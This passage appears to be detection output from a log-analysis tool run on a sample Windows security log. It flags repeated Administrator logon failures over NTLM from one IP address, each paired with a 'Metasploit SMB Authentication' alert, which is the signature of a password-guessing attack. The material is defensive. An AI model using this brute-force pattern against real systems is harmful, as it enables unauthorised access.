SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.191 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MqUoXUf7PKIaoDjs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.191 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.222 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wzeB4DAS1W633tmh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.222 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.263 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UTtXTrqHoCZMbDLT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.263 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.311 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 4HVv5PgPhiDW3qcj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.311 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g21VoO45UrIbTuZO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.344 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.383 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rGpD7AJUTekDmd6Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.383 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.423 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OykzTOn7B9THv0cT : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.423 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.462 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cIYOrBBwX8nFpCzw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.462 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SvnROHLMVnmPfAyy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.508 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5EwJ84H7kXQXzGZz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.547 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 34RLeLWDgLayU3JM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.580 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.619 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QaXHGUgboODAi5Qu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.619 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.659 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QlOlZ0m397CsmaeD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.659 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.699 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: N24rSPCI8DsQIPXR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.699 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.738 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5y2tgoUcs6mFPZm4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.738 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HmFX6MioYqaMumgw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.776 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.820 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: R4HRWlPWPKy1Cicq : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.820 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GDUf7wVbHkS9uaPC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.869 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.917 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eBX0Lviz6Bv5rGcb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.917 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zZwPm9qahLU78FRY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.956 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jOVsopykTHNQcYUp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.008 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n8DY7sdDY8nuWdME : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.060 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.105 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rTxEVu7mudXEBARZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.105 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 7ohqvCoOLkFRcqvE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.148 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: me8rikVJqcKxvHdq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.180 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oLqVmqCmHTrD7V8V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.228 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5ySdyzxvDasHgjq0 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.269 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.312 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: N2auwOc1wemq76n1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.312 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RgK6lHgC5WOBk4kW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.348 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2GG0bKgusKqseQij : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.389 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MpHm7DcOmhq4rkaX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.432 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OX1vVGrE7fJSMEiZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.468 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 65i7wtyAhL58QrzC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.508 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.551 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: k8uSVFRTLTB6g1eg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.551 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ire6VOUMWZQnNjES : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.592 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pGWnvKUXnbJvRqql : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.629 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xBVvrrLf1rnAviKS : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.666 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NE9atGNBlSLQLLcX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.704 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.744 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a0M5EaAXziu07hOH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.744 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PM1mwxqI7yVgoK2D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.784 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.836 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MPqnpvetHXdThxYg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.836 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.879 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gthbVQMJ7UD2QS7H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.879 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AwwJXCoC3gMDoDn7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.920 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: ilNNoVbZpyhtsNkV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.068 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.109 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eNY0lv9IglfHP34d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.109 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.167 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BjSeQciwy17L7raV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.167 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wycE1fIsmPq9zaMU : IP Address: 192.168.198.149 : AuthPackage: 
